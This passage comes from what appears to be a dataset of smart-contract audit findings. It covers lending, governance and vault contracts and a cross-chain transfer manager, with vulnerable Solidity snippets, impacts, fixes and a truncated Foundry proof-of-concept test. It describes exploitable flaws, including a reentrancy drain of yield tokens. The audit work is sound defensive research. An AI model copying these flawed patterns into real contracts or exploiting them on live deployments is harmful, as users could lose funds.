UnwrapTooSmall();\\n```\\n +`Goldilend.lock()` will always revert,high,"In `lock()`, it calls `_refreshiBGT()` before pulling `iBGT` from the user and will revert while calling `iBGTVault(ibgtVault).stake()`.\\n```\\n function lock(uint256 amount) external {\\n uint256 mintAmount = _GiBGTMintAmount(amount);\\n poolSize += 
amount;\\n _refreshiBGT(amount); //@audit should call after depositing funds\\n SafeTransferLib.safeTransferFrom(ibgt, msg.sender, address(this), amount);\\n _mint(msg.sender, mintAmount);\\n emit iBGTLock(msg.sender, amount);\\n }\\n// rest of code\\n function _refreshiBGT(uint256 ibgtAmount) internal {\\n ERC20(ibgt).approve(ibgtVault, ibgtAmount);\\n iBGTVault(ibgtVault).stake(ibgtAmount); //@audit will revert here\\n }\\n```\\n",`_refreshiBGT()` should be called after pulling funds from the user.,Users can't lock `iBGT` as `lock()` always reverts.,"```\\n function lock(uint256 amount) external {\\n uint256 mintAmount = _GiBGTMintAmount(amount);\\n poolSize += amount;\\n _refreshiBGT(amount); //@audit should call after depositing funds\\n SafeTransferLib.safeTransferFrom(ibgt, msg.sender, address(this), amount);\\n _mint(msg.sender, mintAmount);\\n emit iBGTLock(msg.sender, amount);\\n }\\n// rest of code\\n function _refreshiBGT(uint256 ibgtAmount) internal {\\n ERC20(ibgt).approve(ibgtVault, ibgtAmount);\\n iBGTVault(ibgtVault).stake(ibgtAmount); //@audit will revert here\\n }\\n```\\n" +Wrong `PoolSize` increment in `Goldilend.repay()`,high,"When a user repays his loan using `repay()`, it increases `poolSize` with the repaid interest. During the increment, it uses the wrong amount.\\n```\\n function repay(uint256 repayAmount, uint256 _userLoanId) external {\\n Loan memory userLoan = loans[msg.sender][_userLoanId];\\n if(userLoan.borrowedAmount < repayAmount) revert ExcessiveRepay();\\n if(block.timestamp > userLoan.endDate) revert LoanExpired();\\n uint256 interestLoanRatio = FixedPointMathLib.divWad(userLoan.interest, userLoan.borrowedAmount);\\n uint256 interest = FixedPointMathLib.mulWadUp(repayAmount, interestLoanRatio);\\n outstandingDebt -= repayAmount - interest > outstandingDebt ? 
outstandingDebt : repayAmount - interest;\\n loans[msg.sender][_userLoanId].borrowedAmount -= repayAmount;\\n loans[msg.sender][_userLoanId].interest -= interest;\\n poolSize += userLoan.interest * (1000 - (multisigShare + apdaoShare)) / 1000; //@audit should use interest instead of userLoan.interest\\n// rest of code\\n }\\n```\\n\\nIt should use `interest` instead of `userLoan.interest` because the user repaid `interest` only.",`poolSize` should be updated using `interest`.,`poolSize` would be tracked wrongly after calling `repay()` and several functions wouldn't work as expected.,"```\\n function repay(uint256 repayAmount, uint256 _userLoanId) external {\\n Loan memory userLoan = loans[msg.sender][_userLoanId];\\n if(userLoan.borrowedAmount < repayAmount) revert ExcessiveRepay();\\n if(block.timestamp > userLoan.endDate) revert LoanExpired();\\n uint256 interestLoanRatio = FixedPointMathLib.divWad(userLoan.interest, userLoan.borrowedAmount);\\n uint256 interest = FixedPointMathLib.mulWadUp(repayAmount, interestLoanRatio);\\n outstandingDebt -= repayAmount - interest > outstandingDebt ? 
outstandingDebt : repayAmount - interest;\\n loans[msg.sender][_userLoanId].borrowedAmount -= repayAmount;\\n loans[msg.sender][_userLoanId].interest -= interest;\\n poolSize += userLoan.interest * (1000 - (multisigShare + apdaoShare)) / 1000; //@audit should use interest instead of userLoan.interest\\n// rest of code\\n }\\n```\\n" +Users can extend an expired boost using invalidated NFTs.,high,"In `Goldilend.sol#L251`, a user can extend a boost with invalidated NFTs.\\nThe user has created a boost with a valid NFT.\\nAfter that, the NFT was invalidated using `adjustBoosts()`.\\nAfter the original boost is expired, the user can just call `boost()` with empty arrays, and the boost will be extended again with the original magnitude.\\n```\\n function _buildBoost(\\n address[] calldata partnerNFTs,\\n uint256[] calldata partnerNFTIds\\n ) internal returns (Boost memory newUserBoost) {\\n uint256 magnitude;\\n Boost storage userBoost = boosts[msg.sender];\\n if(userBoost.expiry == 0) {\\n// rest of code\\n }\\n else {\\n address[] storage nfts = userBoost.partnerNFTs;\\n uint256[] storage ids = userBoost.partnerNFTIds;\\n magnitude = userBoost.boostMagnitude; //@audit use old magnitude without checking\\n for (uint256 i = 0; i < partnerNFTs.length; i++) {\\n magnitude += partnerNFTBoosts[partnerNFTs[i]];\\n nfts.push(partnerNFTs[i]);\\n ids.push(partnerNFTIds[i]);\\n }\\n newUserBoost = Boost({\\n partnerNFTs: nfts,\\n partnerNFTIds: ids,\\n expiry: block.timestamp + boostLockDuration,\\n boostMagnitude: magnitude\\n });\\n }\\n }\\n```\\n","Whenever users extend their boosts, their NFTs should be evaluated again.",Malicious users can use invalidated NFTs to extend their boosts forever.,"```\\n function _buildBoost(\\n address[] calldata partnerNFTs,\\n uint256[] calldata partnerNFTIds\\n ) internal returns (Boost memory newUserBoost) {\\n uint256 magnitude;\\n Boost storage userBoost = boosts[msg.sender];\\n if(userBoost.expiry == 0) {\\n// rest of code\\n }\\n else 
{\\n address[] storage nfts = userBoost.partnerNFTs;\\n uint256[] storage ids = userBoost.partnerNFTIds;\\n magnitude = userBoost.boostMagnitude; //@audit use old magnitude without checking\\n for (uint256 i = 0; i < partnerNFTs.length; i++) {\\n magnitude += partnerNFTBoosts[partnerNFTs[i]];\\n nfts.push(partnerNFTs[i]);\\n ids.push(partnerNFTIds[i]);\\n }\\n newUserBoost = Boost({\\n partnerNFTs: nfts,\\n partnerNFTIds: ids,\\n expiry: block.timestamp + boostLockDuration,\\n boostMagnitude: magnitude\\n });\\n }\\n }\\n```\\n" +Team members can't unstake the initial allocation forever.,high,"When users call `unstake()`, it calculates the vested amount using `_vestingCheck()`.\\n```\\n function _vestingCheck(address user, uint256 amount) internal view returns (uint256) {\\n if(teamAllocations[user] > 0) return 0; //@audit return 0 for team members\\n uint256 initialAllocation = seedAllocations[user];\\n if(initialAllocation > 0) {\\n if(block.timestamp < vestingStart) return 0;\\n uint256 vestPortion = FixedPointMathLib.divWad(block.timestamp - vestingStart, vestingEnd - vestingStart);\\n return FixedPointMathLib.mulWad(vestPortion, initialAllocation) - (initialAllocation - stakedLocks[user]);\\n }\\n else {\\n return amount;\\n }\\n }\\n```\\n\\nBut it returns 0 for team members and they can't unstake forever. Furthermore, in `stake()`, it just prevents seed investors, not team members. 
So if team members have staked additional tokens, they cannot unstake those either.",`_vestingCheck` should use the same logic as initial investors for team members.,Team members can't unstake forever.,"```\\n function _vestingCheck(address user, uint256 amount) internal view returns (uint256) {\\n if(teamAllocations[user] > 0) return 0; //@audit return 0 for team members\\n uint256 initialAllocation = seedAllocations[user];\\n if(initialAllocation > 0) {\\n if(block.timestamp < vestingStart) return 0;\\n uint256 vestPortion = FixedPointMathLib.divWad(block.timestamp - vestingStart, vestingEnd - vestingStart);\\n return FixedPointMathLib.mulWad(vestPortion, initialAllocation) - (initialAllocation - stakedLocks[user]);\\n }\\n else {\\n return amount;\\n }\\n }\\n```\\n"
+"In `GovLocks`, it shouldn't use a `deposits` mapping",high,"In `GovLocks`, it tracks every user's deposit amount using a `deposits` mapping. As users can transfer `govLocks` freely, they might have fewer `deposits` than their `govLocks` balance and wouldn't be able to withdraw when they want.\\n```\\n function deposit(uint256 amount) external {\\n deposits[msg.sender] += amount; //@audit no need\\n _moveDelegates(address(0), delegates[msg.sender], amount);\\n SafeTransferLib.safeTransferFrom(locks, msg.sender, address(this), amount);\\n _mint(msg.sender, amount);\\n }\\n\\n /// @notice Withdraws Locks to burn Govlocks\\n /// @param amount Amount of Locks to withdraw\\n function withdraw(uint256 amount) external {\\n deposits[msg.sender] -= amount; //@audit no need\\n _moveDelegates(delegates[msg.sender], address(0), amount);\\n _burn(msg.sender, amount);\\n SafeTransferLib.safeTransfer(locks, msg.sender, amount);\\n }\\n```\\n\\nHere is a possible scenario.\\nAlice has deposited 100 `LOCKS` and got 100 `govLOCKS`. 
Also `deposits[Alice] = 100`.\\nBob bought 50 `govLOCKS` from Alice to get voting power.\\nWhen Bob tries to call `withdraw()`, it will revert because `deposits[Bob] = 0` although he has 50 `govLOCKS`.",We don't need to use the `deposits` mapping at all and we can just rely on `govLocks` balances.,Users wouldn't be able to withdraw `LOCKS` with `govLOCKS`.,"```\\n function deposit(uint256 amount) external {\\n deposits[msg.sender] += amount; //@audit no need\\n _moveDelegates(address(0), delegates[msg.sender], amount);\\n SafeTransferLib.safeTransferFrom(locks, msg.sender, address(this), amount);\\n _mint(msg.sender, amount);\\n }\\n\\n /// @notice Withdraws Locks to burn Govlocks\\n /// @param amount Amount of Locks to withdraw\\n function withdraw(uint256 amount) external {\\n deposits[msg.sender] -= amount; //@audit no need\\n _moveDelegates(delegates[msg.sender], address(0), amount);\\n _burn(msg.sender, amount);\\n SafeTransferLib.safeTransfer(locks, msg.sender, amount);\\n }\\n```\\n" +Some functions of `Goldilend` will revert forever.,high,"`Goldilend.multisigInterestClaim()/apdaoInterestClaim()/sunsetProtocol()` will revert forever because they doesn't withdraw `ibgt` from `ibgtVault` before the transfer.\\n```\\n function multisigInterestClaim() external {\\n if(msg.sender != multisig) revert NotMultisig();\\n uint256 interestClaim = multisigClaims;\\n multisigClaims = 0;\\n SafeTransferLib.safeTransfer(ibgt, multisig, interestClaim);\\n }\\n\\n /// @inheritdoc IGoldilend\\n function apdaoInterestClaim() external {\\n if(msg.sender != apdao) revert NotAPDAO();\\n uint256 interestClaim = apdaoClaims;\\n apdaoClaims = 0;\\n SafeTransferLib.safeTransfer(ibgt, apdao, interestClaim);\\n }\\n\\n// rest of code\\n\\n function sunsetProtocol() external {\\n if(msg.sender != timelock) revert NotTimelock();\\n SafeTransferLib.safeTransfer(ibgt, multisig, poolSize - outstandingDebt);\\n }\\n```\\n\\nAs `ibgtVault` has all `ibgt` of `Goldilend`, they should withdraw 
from `ibgtVault` first.","3 functions should be changed like the below.\\n```\\n function multisigInterestClaim() external {\\n if(msg.sender != multisig) revert NotMultisig();\\n uint256 interestClaim = multisigClaims;\\n multisigClaims = 0;\\n+ iBGTVault(ibgtVault).withdraw(interestClaim);\\n SafeTransferLib.safeTransfer(ibgt, multisig, interestClaim);\\n }\\n\\n /// @inheritdoc IGoldilend\\n function apdaoInterestClaim() external {\\n if(msg.sender != apdao) revert NotAPDAO();\\n uint256 interestClaim = apdaoClaims;\\n apdaoClaims = 0;\\n+ iBGTVault(ibgtVault).withdraw(interestClaim);\\n SafeTransferLib.safeTransfer(ibgt, apdao, interestClaim);\\n }\\n\\n// rest of code\\n\\n function sunsetProtocol() external {\\n if(msg.sender != timelock) revert NotTimelock();\\n+ iBGTVault(ibgtVault).withdraw(poolSize - outstandingDebt);\\n SafeTransferLib.safeTransfer(ibgt, multisig, poolSize - outstandingDebt);\\n }\\n```\\n",`Goldilend.multisigInterestClaim()/apdaoInterestClaim()/sunsetProtocol()` will revert forever.,"```\\n function multisigInterestClaim() external {\\n if(msg.sender != multisig) revert NotMultisig();\\n uint256 interestClaim = multisigClaims;\\n multisigClaims = 0;\\n SafeTransferLib.safeTransfer(ibgt, multisig, interestClaim);\\n }\\n\\n /// @inheritdoc IGoldilend\\n function apdaoInterestClaim() external {\\n if(msg.sender != apdao) revert NotAPDAO();\\n uint256 interestClaim = apdaoClaims;\\n apdaoClaims = 0;\\n SafeTransferLib.safeTransfer(ibgt, apdao, interestClaim);\\n }\\n\\n// rest of code\\n\\n function sunsetProtocol() external {\\n if(msg.sender != timelock) revert NotTimelock();\\n SafeTransferLib.safeTransfer(ibgt, multisig, poolSize - outstandingDebt);\\n }\\n```\\n" +`Goldigovernor._getProposalState()` shouldn't use `totalSupply`,medium,"In `_getProposalState()`, it uses `Goldiswap(goldiswap).totalSupply()` during the comparison.\\n```\\n function _getProposalState(uint256 proposalId) internal view returns (ProposalState) {\\n Proposal 
storage proposal = proposals[proposalId];\\n if (proposal.cancelled) return ProposalState.Canceled;\\n else if (block.number <= proposal.startBlock) return ProposalState.Pending;\\n else if (block.number <= proposal.endBlock) return ProposalState.Active;\\n else if (proposal.eta == 0) return ProposalState.Succeeded;\\n else if (proposal.executed) return ProposalState.Executed;\\n else if (proposal.forVotes <= proposal.againstVotes || proposal.forVotes < Goldiswap(goldiswap).totalSupply() / 20) { //@audit shouldn't use totalSupply\\n return ProposalState.Defeated;\\n }\\n else if (block.timestamp >= proposal.eta + Timelock(timelock).GRACE_PERIOD()) {\\n return ProposalState.Expired;\\n }\\n else {\\n return ProposalState.Queued;\\n }\\n }\\n```\\n\\nAs `totalSupply` is increasing in real time, a `Queued` proposal might be changed to `Defeated` one unexpectedly due to the increased supply.",We should introduce another mechanism for the quorum check rather than using `totalSupply`.,A proposal state might be changed unexpectedly.,```\\n function _getProposalState(uint256 proposalId) internal view returns (ProposalState) {\\n Proposal storage proposal = proposals[proposalId];\\n if (proposal.cancelled) return ProposalState.Canceled;\\n else if (block.number <= proposal.startBlock) return ProposalState.Pending;\\n else if (block.number <= proposal.endBlock) return ProposalState.Active;\\n else if (proposal.eta == 0) return ProposalState.Succeeded;\\n else if (proposal.executed) return ProposalState.Executed;\\n else if (proposal.forVotes <= proposal.againstVotes || proposal.forVotes < Goldiswap(goldiswap).totalSupply() / 20) { //@audit shouldn't use totalSupply\\n return ProposalState.Defeated;\\n }\\n else if (block.timestamp >= proposal.eta + Timelock(timelock).GRACE_PERIOD()) {\\n return ProposalState.Expired;\\n }\\n else {\\n return ProposalState.Queued;\\n }\\n }\\n```\\n +"In `Goldivault.redeemYield()`, users can redeem more yield tokens using 
reentrancy",medium,"Possible reentrancy in `Goldivault.redeemYield()` if `yieldToken` has a `beforeTokenTransfer` hook.\\nLet's assume `yt.totalSupply` = 100, `yieldToken.balance` = 100 and the user has 20 yt.\\nThe user calls `redeemYield()` with 10 yt.\\nThen `yt.totalSupply` will be changed to 90 and it will transfer `100 * 10 / 100 = 10 yieldToken` to the user.\\nInside the `beforeTokenTransfer` hook, the user calls `redeemYield()` again with 10 yt.\\nAs `yieldToken.balance` is still 100, he will receive `100 * 10 / 90 = 11 yieldToken`.\\n```\\n function redeemYield(uint256 amount) external {\\n if(amount == 0) revert InvalidRedemption();\\n if(block.timestamp < concludeTime + delay || !concluded) revert NotConcluded();\\n uint256 yieldShare = FixedPointMathLib.divWad(amount, ERC20(yt).totalSupply());\\n YieldToken(yt).burnYT(msg.sender, amount);\\n uint256 yieldTokensLength = yieldTokens.length;\\n for(uint8 i; i < yieldTokensLength; ++i) {\\n uint256 finalYield;\\n if(yieldTokens[i] == depositToken) {\\n finalYield = ERC20(yieldTokens[i]).balanceOf(address(this)) - depositTokenAmount;\\n }\\n else {\\n finalYield = ERC20(yieldTokens[i]).balanceOf(address(this));\\n }\\n uint256 claimable = FixedPointMathLib.mulWad(finalYield, yieldShare);\\n SafeTransferLib.safeTransfer(yieldTokens[i], msg.sender, claimable);\\n }\\n emit YieldTokenRedemption(msg.sender, amount);\\n }\\n```\\n",We should add a `nonReentrant` modifier to `redeemYield()`.,Malicious users can steal `yieldToken` using `redeemYield()`.,"```\\n function redeemYield(uint256 amount) external {\\n if(amount == 0) revert InvalidRedemption();\\n if(block.timestamp < concludeTime + delay || !concluded) revert NotConcluded();\\n uint256 yieldShare = FixedPointMathLib.divWad(amount, ERC20(yt).totalSupply());\\n YieldToken(yt).burnYT(msg.sender, amount);\\n uint256 yieldTokensLength = yieldTokens.length;\\n for(uint8 i; i < yieldTokensLength; ++i) {\\n uint256 finalYield;\\n if(yieldTokens[i] == 
depositToken) {\\n finalYield = ERC20(yieldTokens[i]).balanceOf(address(this)) - depositTokenAmount;\\n }\\n else {\\n finalYield = ERC20(yieldTokens[i]).balanceOf(address(this));\\n }\\n uint256 claimable = FixedPointMathLib.mulWad(finalYield, yieldShare);\\n SafeTransferLib.safeTransfer(yieldTokens[i], msg.sender, claimable);\\n }\\n emit YieldTokenRedemption(msg.sender, amount);\\n }\\n```\\n" +Wrong validation in `Goldigovernor.cancel()`,medium,"In `Goldigovernor.cancel()`, the proposer should have fewer votes than `proposalThreshold` to cancel his proposal.\\n```\\n function cancel(uint256 proposalId) external {\\n if(_getProposalState(proposalId) == ProposalState.Executed) revert InvalidProposalState();\\n Proposal storage proposal = proposals[proposalId];\\n if(msg.sender != proposal.proposer) revert NotProposer();\\n if(GovLocks(govlocks).getPriorVotes(proposal.proposer, block.number - 1) > proposalThreshold) revert AboveThreshold(); //@audit incorrect\\n proposal.cancelled = true;\\n uint256 targetsLength = proposal.targets.length;\\n for (uint256 i = 0; i < targetsLength; i++) {\\n Timelock(timelock).cancelTransaction(proposal.targets[i], proposal.eta, proposal.values[i], proposal.calldatas[i], proposal.signatures[i]);\\n }\\n emit ProposalCanceled(proposalId);\\n }\\n```\\n","It should be modified like this.\\n```\\nif(msg.sender != proposal.proposer && GovLocks(govlocks).getPriorVotes(proposal.proposer, block.number - 1) > proposalThreshold) revert Error;\\n```\\n",A proposer can't cancel his proposal unless he decreases his voting power.,"```\\n function cancel(uint256 proposalId) external {\\n if(_getProposalState(proposalId) == ProposalState.Executed) revert InvalidProposalState();\\n Proposal storage proposal = proposals[proposalId];\\n if(msg.sender != proposal.proposer) revert NotProposer();\\n if(GovLocks(govlocks).getPriorVotes(proposal.proposer, block.number - 1) > proposalThreshold) revert AboveThreshold(); //@audit incorrect\\n 
proposal.cancelled = true;\\n uint256 targetsLength = proposal.targets.length;\\n for (uint256 i = 0; i < targetsLength; i++) {\\n Timelock(timelock).cancelTransaction(proposal.targets[i], proposal.eta, proposal.values[i], proposal.calldatas[i], proposal.signatures[i]);\\n }\\n emit ProposalCanceled(proposalId);\\n }\\n```\\n" +Users wouldn't cancel their proposals due to the increased `proposalThreshold`.,medium,"When users call `cancel()`, it validates the caller's voting power with `proposalThreshold` which can be changed using `setProposalThreshold()`.\\n```\\n function setProposalThreshold(uint256 newProposalThreshold) external {\\n if(msg.sender != multisig) revert NotMultisig();\\n if(newProposalThreshold < MIN_PROPOSAL_THRESHOLD || newProposalThreshold > MAX_PROPOSAL_THRESHOLD) revert InvalidVotingParameter();\\n uint256 oldProposalThreshold = proposalThreshold;\\n proposalThreshold = newProposalThreshold;\\n emit ProposalThresholdSet(oldProposalThreshold, proposalThreshold);\\n }\\n```\\n\\nHere is a possible scenario.\\nLet's assume `proposalThreshold` = 100 and a user has 100 voting power.\\nThe user has proposed a proposal using `propose()`.\\nAfter that, `proposalThreshold` was increased to 150 by `multisig`.\\nWhen the user calls `cancel()`, it will revert as he doesn't have enough voting power.",It would be good to cache `proposalThreshold` as a proposal state.,Users wouldn't cancel their proposals due to the increased `proposalThreshold`.,"```\\n function setProposalThreshold(uint256 newProposalThreshold) external {\\n if(msg.sender != multisig) revert NotMultisig();\\n if(newProposalThreshold < MIN_PROPOSAL_THRESHOLD || newProposalThreshold > MAX_PROPOSAL_THRESHOLD) revert InvalidVotingParameter();\\n uint256 oldProposalThreshold = proposalThreshold;\\n proposalThreshold = newProposalThreshold;\\n emit ProposalThresholdSet(oldProposalThreshold, proposalThreshold);\\n }\\n```\\n" +`Goldilend.liquidate()` might revert due to underflow,medium,"In 
`repay()`, there would be a rounding during the `interest` calculation.\\n```\\n function repay(uint256 repayAmount, uint256 _userLoanId) external {\\n Loan memory userLoan = loans[msg.sender][_userLoanId];\\n if(userLoan.borrowedAmount < repayAmount) revert ExcessiveRepay();\\n if(block.timestamp > userLoan.endDate) revert LoanExpired();\\n uint256 interestLoanRatio = FixedPointMathLib.divWad(userLoan.interest, userLoan.borrowedAmount);\\nL425 uint256 interest = FixedPointMathLib.mulWadUp(repayAmount, interestLoanRatio); //@audit rounding issue\\n outstandingDebt -= repayAmount - interest > outstandingDebt ? outstandingDebt : repayAmount - interest;\\n // rest of code\\n }\\n// rest of code\\n function liquidate(address user, uint256 _userLoanId) external {\\n Loan memory userLoan = loans[msg.sender][_userLoanId];\\n if(block.timestamp < userLoan.endDate || userLoan.liquidated || userLoan.borrowedAmount == 0) revert Unliquidatable();\\n loans[user][_userLoanId].liquidated = true;\\n loans[user][_userLoanId].borrowedAmount = 0;\\nL448 outstandingDebt -= userLoan.borrowedAmount - userLoan.interest;\\n // rest of code\\n }\\n```\\n\\nHere is a possible scenario.\\nThere are 2 borrowers of `borrowedAmount = 100, interest = 10`. And `outstandingDebt = 2 * (100 - 10) = 180`.\\nThe first borrower calls `repay()` with `repayAmount = 100`.\\nDue to the rounding issue at L425, `interest` is 9 instead of 10. 
And `outstandingDebt = 180 - (100 - 9) = 89`.\\nIn `liquidate()` for the second borrower, it will revert at L448 because `outstandingDebt = 89 < borrowedAmount - interest = 90`.","In `liquidate()`, `outstandingDebt` should be updated like the below.\\n```\\n /// @inheritdoc IGoldilend\\n function liquidate(address user, uint256 _userLoanId) external {\\n Loan memory userLoan = loans[msg.sender][_userLoanId];\\n if(block.timestamp < userLoan.endDate || userLoan.liquidated || userLoan.borrowedAmount == 0) revert Unliquidatable();\\n loans[user][_userLoanId].liquidated = true;\\n loans[user][_userLoanId].borrowedAmount = 0;\\n// Add the line below\\n uint256 debtToRepay = userLoan.borrowedAmount - userLoan.interest;\\n// Add the line below\\n outstandingDebt -= debtToRepay > outstandingDebt ? outstandingDebt : debtToRepay;\\n // rest of code\\n }\\n```\\n",`liquidate()` might revert due to underflow.,"```\\n function repay(uint256 repayAmount, uint256 _userLoanId) external {\\n Loan memory userLoan = loans[msg.sender][_userLoanId];\\n if(userLoan.borrowedAmount < repayAmount) revert ExcessiveRepay();\\n if(block.timestamp > userLoan.endDate) revert LoanExpired();\\n uint256 interestLoanRatio = FixedPointMathLib.divWad(userLoan.interest, userLoan.borrowedAmount);\\nL425 uint256 interest = FixedPointMathLib.mulWadUp(repayAmount, interestLoanRatio); //@audit rounding issue\\n outstandingDebt -= repayAmount - interest > outstandingDebt ? 
outstandingDebt : repayAmount - interest;\\n // rest of code\\n }\\n// rest of code\\n function liquidate(address user, uint256 _userLoanId) external {\\n Loan memory userLoan = loans[msg.sender][_userLoanId];\\n if(block.timestamp < userLoan.endDate || userLoan.liquidated || userLoan.borrowedAmount == 0) revert Unliquidatable();\\n loans[user][_userLoanId].liquidated = true;\\n loans[user][_userLoanId].borrowedAmount = 0;\\nL448 outstandingDebt -= userLoan.borrowedAmount - userLoan.interest;\\n // rest of code\\n }\\n```\\n" +"In `Goldigovernor`, wrong assumption of block time",medium,"In `Goldigovernor.sol`, voting period/delay limits are set with 15s block time.\\n```\\n /// @notice Minimum voting period\\n uint32 public constant MIN_VOTING_PERIOD = 5760; // About 24 hours\\n\\n /// @notice Maximum voting period\\n uint32 public constant MAX_VOTING_PERIOD = 80640; // About 2 weeks\\n\\n /// @notice Minimum voting delay\\n uint32 public constant MIN_VOTING_DELAY = 1;\\n\\n /// @notice Maximum voting delay\\n uint32 public constant MAX_VOTING_DELAY = 40320; // About 1 week\\n```\\n\\nBut Berachain has 5s block time according to its documentation.\\n```\\nBerachain has the following properties:\\n\\n- Block time: 5s\\n```\\n\\nSo these limits will be set shorter than expected.",We should calculate these limits with 5s block time.,Voting period/delay limits will be set shorter than expected.,```\\n /// @notice Minimum voting period\\n uint32 public constant MIN_VOTING_PERIOD = 5760; // About 24 hours\\n\\n /// @notice Maximum voting period\\n uint32 public constant MAX_VOTING_PERIOD = 80640; // About 2 weeks\\n\\n /// @notice Minimum voting delay\\n uint32 public constant MIN_VOTING_DELAY = 1;\\n\\n /// @notice Maximum voting delay\\n uint32 public constant MAX_VOTING_DELAY = 40320; // About 1 week\\n```\\n +Queued transfers can become stuck on the source chain if Transceiver instructions are encoded in the incorrect order,high,"In the case of multiple Transceivers, 
the current logic expects that a sender encodes Transceiver instructions in order of increasing Transceiver registration index, as validated in `TransceiverStructs::parseTransceiverInstructions`. Under normal circumstances, this logic works as expected, and the transaction fails when the user packs transceiver instructions in the incorrect order.\\n```\\n/* snip */\\nfor (uint256 i = 0; i < instructionsLength; i++) {\\n TransceiverInstruction memory instruction;\\n (instruction, offset) = parseTransceiverInstructionUnchecked(encoded, offset);\\n\\n uint8 instructionIndex = instruction.index;\\n\\n // The instructions passed in have to be strictly increasing in terms of transceiver index\\n if (i != 0 && instructionIndex <= lastIndex) {\\n revert UnorderedInstructions();\\n }\\n lastIndex = instructionIndex;\\n\\n instructions[instructionIndex] = instruction;\\n}\\n/* snip */\\n```\\n\\nHowever, this requirement on the order of Transceiver indices is not checked when transfers are initially queued for delayed execution. As a result, a transaction where this is the case will fail when the user calls `NttManager::completeOutboundQueuedTransfer` to execute a queued transfer.","When the transfer amount exceeds the current outbound capacity, verify the Transceiver instructions are ordered correctly before adding a message to the list of queued transfers.","The sender's funds are transferred to the NTT Manager when messages are queued. 
However, this queued message can never be executed if the Transceiver indices are incorrectly ordered and, as a result, the user funds remain stuck in the NTT Manager.\\nProof of Concept: Run the following test:\\n```\\ncontract TestWrongTransceiverOrder is Test, INttManagerEvents, IRateLimiterEvents {\\n NttManager nttManagerChain1;\\n NttManager nttManagerChain2;\\n\\n using TrimmedAmountLib for uint256;\\n using TrimmedAmountLib for TrimmedAmount;\\n\\n uint16 constant chainId1 = 7;\\n uint16 constant chainId2 = 100;\\n uint8 constant FAST_CONSISTENCY_LEVEL = 200;\\n uint256 constant GAS_LIMIT = 500000;\\n\\n uint16 constant SENDING_CHAIN_ID = 1;\\n uint256 constant DEVNET_GUARDIAN_PK =\\n 0xcfb12303a19cde580bb4dd771639b0d26bc68353645571a8cff516ab2ee113a0;\\n WormholeSimulator guardian;\\n uint256 initialBlockTimestamp;\\n\\n WormholeTransceiver wormholeTransceiverChain1;\\n WormholeTransceiver wormholeTransceiver2Chain1;\\n\\n WormholeTransceiver wormholeTransceiverChain2;\\n address userA = address(0x123);\\n address userB = address(0x456);\\n address userC = address(0x789);\\n address userD = address(0xABC);\\n\\n address relayer = address(0x28D8F1Be96f97C1387e94A53e00eCcFb4E75175a);\\n IWormhole wormhole = IWormhole(0x706abc4E45D419950511e474C7B9Ed348A4a716c);\\n\\n function setUp() public {\\n string memory url = ""https://goerli.blockpi.network/v1/rpc/public"";\\n vm.createSelectFork(url);\\n initialBlockTimestamp = vm.getBlockTimestamp();\\n\\n guardian = new WormholeSimulator(address(wormhole), DEVNET_GUARDIAN_PK);\\n\\n vm.chainId(chainId1);\\n DummyToken t1 = new DummyToken();\\n NttManager implementation =\\n new MockNttManagerContract(address(t1), INttManager.Mode.LOCKING, chainId1, 1 days);\\n\\n nttManagerChain1 =\\n MockNttManagerContract(address(new ERC1967Proxy(address(implementation), """")));\\n nttManagerChain1.initialize();\\n\\n WormholeTransceiver wormholeTransceiverChain1Implementation = new MockWormholeTransceiverContract(\\n 
address(nttManagerChain1),\\n address(wormhole),\\n address(relayer),\\n address(0x0),\\n FAST_CONSISTENCY_LEVEL,\\n GAS_LIMIT\\n );\\n wormholeTransceiverChain1 = MockWormholeTransceiverContract(\\n address(new ERC1967Proxy(address(wormholeTransceiverChain1Implementation), """"))\\n );\\n\\n WormholeTransceiver wormholeTransceiverChain1Implementation2 = new MockWormholeTransceiverContract(\\n address(nttManagerChain1),\\n address(wormhole),\\n address(relayer),\\n address(0x0),\\n FAST_CONSISTENCY_LEVEL,\\n GAS_LIMIT\\n );\\n wormholeTransceiver2Chain1 = MockWormholeTransceiverContract(\\n address(new ERC1967Proxy(address(wormholeTransceiverChain1Implementation2), """"))\\n );\\n\\n\\n // Actually initialize properly now\\n wormholeTransceiverChain1.initialize();\\n wormholeTransceiver2Chain1.initialize();\\n\\n\\n nttManagerChain1.setTransceiver(address(wormholeTransceiverChain1));\\n nttManagerChain1.setTransceiver(address(wormholeTransceiver2Chain1));\\n nttManagerChain1.setOutboundLimit(type(uint64).max);\\n nttManagerChain1.setInboundLimit(type(uint64).max, chainId2);\\n\\n // Chain 2 setup\\n vm.chainId(chainId2);\\n DummyToken t2 = new DummyTokenMintAndBurn();\\n NttManager implementationChain2 =\\n new MockNttManagerContract(address(t2), INttManager.Mode.BURNING, chainId2, 1 days);\\n\\n nttManagerChain2 =\\n MockNttManagerContract(address(new ERC1967Proxy(address(implementationChain2), """")));\\n nttManagerChain2.initialize();\\n\\n WormholeTransceiver wormholeTransceiverChain2Implementation = new MockWormholeTransceiverContract(\\n address(nttManagerChain2),\\n address(wormhole),\\n address(relayer),\\n address(0x0),\\n FAST_CONSISTENCY_LEVEL,\\n GAS_LIMIT\\n );\\n\\n wormholeTransceiverChain2 = MockWormholeTransceiverContract(\\n address(new ERC1967Proxy(address(wormholeTransceiverChain2Implementation), """"))\\n );\\n wormholeTransceiverChain2.initialize();\\n\\n nttManagerChain2.setTransceiver(address(wormholeTransceiverChain2));\\n 
nttManagerChain2.setOutboundLimit(type(uint64).max);\\n nttManagerChain2.setInboundLimit(type(uint64).max, chainId1);\\n\\n // Register peer contracts for the nttManager and transceiver. Transceivers and nttManager each have the concept of peers here.\\n nttManagerChain1.setPeer(chainId2, bytes32(uint256(uint160(address(nttManagerChain2)))), 9);\\n nttManagerChain2.setPeer(chainId1, bytes32(uint256(uint160(address(nttManagerChain1)))), 7);\\n\\n // Set peers for the transceivers\\n wormholeTransceiverChain1.setWormholePeer(\\n chainId2, bytes32(uint256(uint160(address(wormholeTransceiverChain2))))\\n );\\n\\n wormholeTransceiver2Chain1.setWormholePeer(\\n chainId2, bytes32(uint256(uint160(address(wormholeTransceiverChain2))))\\n );\\n\\n wormholeTransceiverChain2.setWormholePeer(\\n chainId1, bytes32(uint256(uint160(address(wormholeTransceiverChain1))))\\n );\\n\\n require(nttManagerChain1.getThreshold() != 0, ""Threshold is zero with active transceivers"");\\n\\n // Actually set it\\n nttManagerChain1.setThreshold(2);\\n nttManagerChain2.setThreshold(1);\\n }\\n\\n function testWrongTransceiverOrder() external {\\n vm.chainId(chainId1);\\n\\n // Setting up the transfer\\n DummyToken token1 = DummyToken(nttManagerChain1.token());\\n uint8 decimals = 